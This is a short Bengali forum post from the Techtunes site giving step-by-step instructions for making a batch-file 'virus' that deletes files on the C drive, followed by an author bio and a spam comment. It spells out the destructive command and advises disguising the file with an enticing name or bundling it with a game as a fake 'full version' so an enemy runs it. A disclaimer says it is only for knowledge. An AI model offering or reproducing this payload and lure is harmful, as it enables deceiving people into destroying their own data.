বিসমিল্লাহির রহমানির রাহিম
টেকটিউনস এ এটা আমার প্রথম টিউন, তাই কোনো ভুল হলে মাফ করে দিবেন আসল কথায় আসি, যারা জানেন তারা টিউনটি না পড়লেই ভালো
ছোট একটি Virus তৈরী করে c drive এর সব ফাইল মুছে ফেলুন Virus টা তৈরী করতে আপনাকে অভিজ্ঞতা সম্পূর্ন হতে হবে না
প্রথমে start menu থেকে notepad ওপেন করুন
এখন নীচের কোডটি কপি করে পেস্ট করুন বা টাইপ করুন
@Echo off
Del C:\ *.* |y
এখন এটাকে যেকোনো নামে সেভ করুন তবে শেষে .bat দিতে হবে যেমন: khaicitore.bat
ব্যাস হয়ে গেলো তবে আপনার শত্রু আকর্ষিত হয় এরকম কোনো নাম দিয়ে সেভ করলেই সবচেয়ে ভালো হয়
এবার এটাকে এমন এক জায়গায় রাখুন যেখানে আপনার শত্রু দেখলে ডাবল ক্লিক করতে পারে আপনি চাইলে এটাকে যেকোনো গেম এর সাথে দিয়ে দিতে পারেন এবং লিখে দিতে পারেন full version যাতে আপনার শত্রু এটাকে ঐ গেমটার ফুল ভার্সন করার ফাইল মনে করে ডাবল ক্লিক করে
সতর্কবাণীঃ জানার কোনো শেষ নাই আমি এটা শুধু জানার জন্যই টিউন করলাম এর মানে এই নয় যে কারো ক্ষতি করতে হবে তাই দয়া করে কারো কোনো ক্ষতি করবেন না
বিশেষ সতর্কবাণীঃ ভুল করেও আপনার কম্পিউটারে এটা পরীক্ষা করতে যাবেন না
কারো কোনো ক্ষতির জন্য টিউনার দায়ী নয়
আমি মোহাম্মদ নাজমুল হোসাইন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 3 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 1 টি টিউন ও 6 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
আমার সম্পর্কে বলার কিছুই নাই
Nice Tune. http://gptune.wapka.mobi